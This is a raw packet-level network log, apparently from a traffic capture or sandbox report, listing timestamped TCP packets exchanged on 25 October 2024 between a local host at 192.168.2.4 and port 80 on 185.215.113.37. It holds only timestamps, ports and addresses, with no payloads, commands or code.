Oct 25, 2024 05:21:14.988681078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.988745928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.988758087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.988768101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.988780022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.988785028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.988790989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.988799095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.988802910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.988816023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.988826036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.988857985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989049911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989063025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989073038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989084005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989094019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989101887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989101887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989104986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989129066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989130974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989140987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989151955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989157915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989164114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989171028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989187956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989193916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989198923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989209890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989217997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989218950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989228964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989233017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989244938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989257097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989260912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989281893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989290953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989641905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989655018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989685059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989729881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989758015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989768982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989778996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989789963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989795923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989800930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989808083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989814043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989830017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989841938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989851952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989881039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989885092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989898920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989907980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989918947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989928961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989933968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989939928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989944935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.989955902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989964962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.989998102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990008116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990020037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990029097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990041018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990046978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990108967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990120888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990129948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990142107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990144968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990144968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990145922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990175009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990200043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990200996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990211964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990222931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990233898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990236998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990246058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990252018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990279913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990394115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990432978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990483999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990494967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990504980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990530014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990559101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990570068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990571022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990582943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990593910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990605116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990612030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990614891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990627050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990638971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990644932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990649939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990679026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990693092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990705967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990710020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990742922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990772963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990814924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990827084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990837097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990848064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990854979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990859985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990871906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990884066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990886927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990896940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.990926027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.990942955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991075993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991121054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991139889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991151094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991162062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991173029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991188049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991188049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991198063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991204023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991211891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991223097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991235018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991238117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991245985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991257906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991275072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991291046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991307020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991327047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991338015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991348982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991352081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991369963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991377115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991383076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991394997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991401911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991406918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991417885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991426945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991430044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991461039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991493940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991493940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991507053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991518021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991533995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991543055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991554976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991564035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991568089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991585016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991596937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991614103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991628885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991703033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991739988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.991832972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.991875887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992384911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992430925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992506981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992518902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992530107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992541075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992544889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992553949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992557049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992566109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992579937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992621899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992670059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992688894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992701054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992713928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992714882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992726088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992738008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992747068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992750883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992770910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992774963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992784023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992790937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992795944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992815971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992822886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992827892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992840052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992851019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992852926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992865086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992873907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992877007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992888927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992888927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992901087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992912054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992921114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992923021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992940903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992952108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992958069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992963076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.992980003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.992989063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.993026018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.038731098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.038748026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.038760900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.038927078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.038928032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105323076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105348110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105359077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105417967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105417967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105536938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105555058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105566025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105576992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105587006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105598927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105608940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105619907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105631113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105643034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105653048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105684996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105684996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105684996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105684996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105684996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105684996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105751991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105766058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105775118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105787039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105794907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105799913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105811119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105819941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105822086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105834961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105845928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105848074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105856895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105865002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105885029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105887890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105896950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105906963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105911016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105918884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105930090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105937004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105941057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105952024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105962038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105963945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105972052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105983019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.105987072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.105993032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106004953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106004953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106015921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106026888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106034040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106061935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106064081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106082916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106091022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106096029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106102943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106106997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106117964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106127024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106131077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106134892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106142044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106153011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106163025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106174946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106193066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106203079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106204987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106215000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106234074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106249094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106260061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106261015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106281996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106292963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106292963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106304884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106318951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106323957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106336117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106343985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106347084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106357098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106367111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106370926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106378078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106388092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106393099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106400013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106410980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106424093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106431007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106442928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106448889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106455088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106460094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:15.106476068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:15.106488943 CEST	80	49730	185.215.113.37	192.168.2.4
